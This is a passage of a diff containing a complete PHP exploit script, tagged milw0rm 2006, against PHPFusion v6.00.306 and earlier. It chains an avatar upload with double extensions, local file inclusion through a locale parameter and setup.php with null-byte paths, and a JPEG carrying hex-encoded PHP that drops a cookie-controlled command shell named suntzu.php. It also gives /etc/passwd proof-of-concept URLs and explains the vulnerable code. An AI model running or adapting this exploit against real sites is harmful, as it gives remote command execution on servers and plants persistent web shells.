-$packet.="Cache-Control: no-cache\r\n\r\n";
-$packet.=$data;
-sendpacketiii($packet);
-
-echo "step 3 -> try to launch code inside image before has chmod()...\r\n";
-for ($i=0; $i<=9; $i++)
-{
-$packet ="GET ".$p."images/avatars/.php.php[".$user_id."].gif-fakechars- HTTP/1.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-}
-
-echo "step 3b -> try to include through last_seen_users_panel.php\r\n";
-//works with register_globals=on & magic_quotes_gpc=off
-$xpl=urlencode("../../../../images/avatars/.php.php[".$user_id."].gif-fakechars-".chr(0x00));
-$packet ="GET ".$p."infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=$xpl HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-
-echo "step 3c -> try to include through setup.php script\r\n";
-//works with magic_quotes_gpc=off
-$xpl=urlencode("../images/avatars/.php.php[".$user_id."].gif-fakechars-".chr(0x00));
-$packet ="GET ".$p."setup.php?localeset=$xpl HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-
-echo "step 4 -> delete avatar...\r\n";
-$data='-----------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_name"
-
-'.$username.'
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_newpassword"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_newpassword2"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_email"
-
-whattttt@hotmail.com
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_hide_email"
-
-1
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_location"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_month"
-
---
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_day"
-
---
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_year"
-
-----
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_aim"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_icq"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_msn"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_yahoo"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_web"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_theme"
-
-Default
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_offset"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_avatar"; filename="whatever"
-Content-Type: application/octet-stream
-
-what
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_sig"
-
-
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="user_hash"
-
-'.md5($pass).'
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="update_profile"
-
-Update Profile
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="del_avatar"
-
-y
------------------------------7d6ee3a7074a--
-';
-
-$packet ="POST ".$p."edit_profile.php HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."edit_profile.php\r\n";
-$packet.="Accept-Language: en\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Keep-Alive\r\n";
-$packet.="Cookie: fusion_visited=yes; ".$cookie." PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n";
-$packet.="Cache-Control: no-cache\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-
-echo "step 5 -> launch commands...\r\n";
-for ($i=0; $i<=count($mypaths)-1; $i++)
-{
-$packet ="GET ".$p.$mypaths[$i]."suntzu.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (strstr($html,"56789"))
-{
-  echo "Exploit succeeded...";
-  $temp=explode("56789",$html);
-  die("\r\n".$temp[1]."\r\n");
-}
-}
-//if you are here...
-echo "\r\nExploit failed...";
-?>
-
-# milw0rm.com [2006-05-07]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "PHPFusion <= v6.00.306 avatar mod_mime arbitrary file upload &\r\n";
+echo "local inclusion vulnerabilities\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+
+if ($argc<6) {
+echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to PHPFusion\r\n";
+echo "cmd:       a shell command\r\n";
+echo "user/pass: you need a valid user account to upload an avatar\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /phpfusion/ your_username password cat ./../../config.php\r\n";
+echo "php ".$argv[0]." localhost /phpfusion/ your_username password ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
+die;
+}
+
+/* explaination:
+
+   software site: http://www.php-fusion.co.uk/
+
+   description: "a light-weight open-source content management system (CMS)
+   written in PHP. It utilises a mySQL database to store your site content and
+   includes a simple, comprehensive adminstration system."
+
+   tested versions:   PHPFusion v6.00.306
+                      PHPFusion v6.00.207
+                      PHPFusion v6.00.110
+
+
+   i) vulnerable code in includes/update_profile_include.php at lines 69-90:
+
+   ...
+   $newavatar = $_FILES['user_avatar'];
+	if ($userdata['user_avatar'] == "" && !empty($newavatar['name']) && is_uploaded_file($newavatar['tmp_name'])) {
+		if (preg_match("/^[-0-9A-Z_\.\[\]]+$/i", $newavatar['name']) && $newavatar['size'] <= 30720) {
+                       	$avatarext = strrchr($newavatar['name'],".");
+			if (eregi(".gif", $avatarext) || eregi(".jpg", $avatarext) || eregi(".png", $avatarext)) {
+				$avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], "."));
+				$avatarname = $avatarname."[".$userdata['user_id']."]".$avatarext;
+				$set_avatar = "user_avatar='$avatarname', ";
+				move_uploaded_file($newavatar['tmp_name'], IMAGES."avatars/".$avatarname);
+				chmod(IMAGES."avatars/".$avatarname,0644);
+				if ($size = @getimagesize(IMAGES."avatars/".$avatarname)) {
+					if ($size['0'] > 100 || $size['1'] > 100) {
+						unlink(IMAGES."avatars/".$avatarname);
+						$set_avatar = "";
+					}
+				} else {
+					unlink(IMAGES."avatars/".$avatarname);
+					$set_avatar = "";
+				}
+			}
+		}
+	}
+   ...
+
+   A remote user can upload a malicious avatar with multiple extensions,
+   (ex.: .php.php.gif-fakechars-) and with php code inside as EXIF metadata
+   content.
+   It seems that Apache mod_mime module considers double-extension files like
+   file.php.gif[somefakechars] to be valid PHP files and runs the arbitrary
+   code that has been uploaded. Actually I can't say which Apache versions, this
+   was tested against Apache/1.3.27 with PHP/4.3.3
+
+   A note: file is renamed like this
+   .php.php[user_id].gif-fakechars-
+
+   ii) vulnerable code in infusions/last_seen_users_panel/last_seen_users_panel.php
+       at lines 12-16:
+
+   ...
+   if (file_exists(INFUSIONS."last_seen_users_panel/locale/".$settings['locale'].".php")) {
+	include INFUSIONS."last_seen_users_panel/locale/".$settings['locale'].".php";
+} else {
+	include INFUSIONS."last_seen_users_panel/locale/English.php";
+}
+   ...
+
+    $settings['locale'] var is not properly sanitized before to be used to
+    include files so, if register_globals=on & magic_quotes_gpc=Off,
+    you can include local resources, poc:
+
+    http://[target]/[path]infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=../../../../../../../../../etc/passw%00
+    http://[target]/[path]infusions/last_seen_users_panel/last_seen_users_panel.php?cmd=ls%20-la&settings[locale]=../../../../images/avatars/suntzu[1].jpg%00
+
+    A note: if INFUSIONS constant is not defined, PHP will assume it as it is,
+    as "INFUSIONS" string. On some system , no matters if "INFUSIONSlast_seen_users_panel/locale/........"
+    path does not exist, you will go up from the non-existent dir of exactly four
+    dirs to include the malicious avatar.
+    This works against on 6.00.306
+
+    iii) vulnerable code in setup.php at lines 14-15:
+
+    ...
+    $localeset = (isset($_GET['localeset']) ? $_GET['localeset'] : "English");
+    include "locale/".$localeset."/setup.php";
+    ...
+
+    if this script is not deleted after installation, if magic_quotes_gpc=Off,
+    you can include files from locale resources, poc:
+
+    http://[target]/[path]/setup.php?localeset=../../../../../../../../../../etc/passwd%00
+    http://[target]/[path]/setup.php?cmd=ls%20-la&localeset=../images/avatars/suntzu[1].jpg%00
+
+    this tool tries to exploit all theese vulnerabilities, you need a valid user
+    account to upload avatars
+*/
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+
+}
+function sendpacketiii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+
+}
+$host=$argv[1];
+$path=$argv[2];
+$username=$argv[3];
+$pass=$argv[4];
+$cmd="";$port=80;$proxy="";
+for ($i=5; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$mypaths= array (
+		 'images/avatars/',
+		 '',
+		 'infusions/last_seen_users_panel/'
+		);
+
+echo "step 0 -> Check if suntzu.php is already installed...\r\n";
+for ($i=0; $i<=count($mypaths)-1; $i++)
+{
+$packet ="GET ".$p.$mypaths[$i]."suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+  echo "Exploit succeeded...";
+  $temp=explode("56789",$html);
+  die("\r\n".$temp[1]."\r\n");
+}
+}
+
+echo "step 1 -> login...\r\n";
+$data ="user_name=".urlencode(trim($username));
+$data.="&user_pass=".urlencode(trim($pass));
+$data.="&login=Login";
+$packet="POST ".$p."news.php HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
+$packet.="Referer: http://".$host.$path."news.php\r\n";
+$packet.="Accept-Language: en\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Keep-Alive\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(' ',$temp[1]);
+$cookie=$temp2[0];
+echo 'Your cookie: '.$cookie."\r\n";
+$temp=explode("fusion_user=",$cookie);
+$temp2=explode(".",$temp[1]);
+$user_id=trim($temp2[0]);
+echo 'Your user id: '.$user_id."\r\n";
+
+echo "step 2 -> upload a malicious avatar with php code inside...\r\n";
+$avatar=".php.php.gif-fakechars-";
+$shell=
+chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
+chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
+chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
+chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
+chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
+chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
+chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
+chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
+chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
+chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
+chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
+chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
+chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
+chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
+chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
+chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
+chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
+chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
+chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
+chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
+chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
+chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
+chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
+chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
+chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
+chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
+chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
+chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
+chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
+chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
+chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
+chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
+chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
+chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
+chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
+chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
+chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
+chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
+chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
+chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
+chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
+chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
+chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
+chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
+chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
+
+/*
+this image has this code inside as EXIF metadata content
+<?php
+$fp=fopen("suntzu.php","w");
+fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
+fclose($fp);
+chmod("suntzu.php",777);
+?>
+*/
+
+$data='-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_name"
+
+'.$username.'
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_newpassword"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_newpassword2"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_email"
+
+succcccccp@hotmail.com
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_hide_email"
+
+1
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_location"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_month"
+
+--
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_day"
+
+--
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_year"
+
+----
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_aim"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_icq"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_msn"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_yahoo"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_web"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_theme"
+
+Default
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_offset"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_avatar"; filename="'.$avatar.'"
+Content-Type: application/octet-stream
+
+'.$shell.'
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_sig"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_hash"
+
+'.md5($pass).'
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="update_profile"
+
+Update Profile
+-----------------------------7d6ee3a7074a--
+';
+
+
+$packet ="POST ".$p."edit_profile.php? HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."edit_profile.php\r\n";
+$packet.="Accept-Language: en\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Keep-Alive\r\n";
+$packet.="Cookie: fusion_visited=yes; ".$cookie." PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n";
+$packet.="Cache-Control: no-cache\r\n\r\n";
+$packet.=$data;
+sendpacketiii($packet);
+
+echo "step 3 -> try to launch code inside image before has chmod()...\r\n";
+for ($i=0; $i<=9; $i++)
+{
+$packet ="GET ".$p."images/avatars/.php.php[".$user_id."].gif-fakechars- HTTP/1.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+}
+
+echo "step 3b -> try to include through last_seen_users_panel.php\r\n";
+//works with register_globals=on & magic_quotes_gpc=off
+$xpl=urlencode("../../../../images/avatars/.php.php[".$user_id."].gif-fakechars-".chr(0x00));
+$packet ="GET ".$p."infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=$xpl HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+
+echo "step 3c -> try to include through setup.php script\r\n";
+//works with magic_quotes_gpc=off
+$xpl=urlencode("../images/avatars/.php.php[".$user_id."].gif-fakechars-".chr(0x00));
+$packet ="GET ".$p."setup.php?localeset=$xpl HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+
+echo "step 4 -> delete avatar...\r\n";
+$data='-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_name"
+
+'.$username.'
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_newpassword"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_newpassword2"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_email"
+
+whattttt@hotmail.com
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_hide_email"
+
+1
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_location"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_month"
+
+--
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_day"
+
+--
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_year"
+
+----
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_aim"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_icq"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_msn"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_yahoo"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_web"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_theme"
+
+Default
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_offset"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_avatar"; filename="whatever"
+Content-Type: application/octet-stream
+
+what
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_sig"
+
+
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="user_hash"
+
+'.md5($pass).'
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="update_profile"
+
+Update Profile
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="del_avatar"
+
+y
+-----------------------------7d6ee3a7074a--
+';
+
+$packet ="POST ".$p."edit_profile.php HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."edit_profile.php\r\n";
+$packet.="Accept-Language: en\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Keep-Alive\r\n";
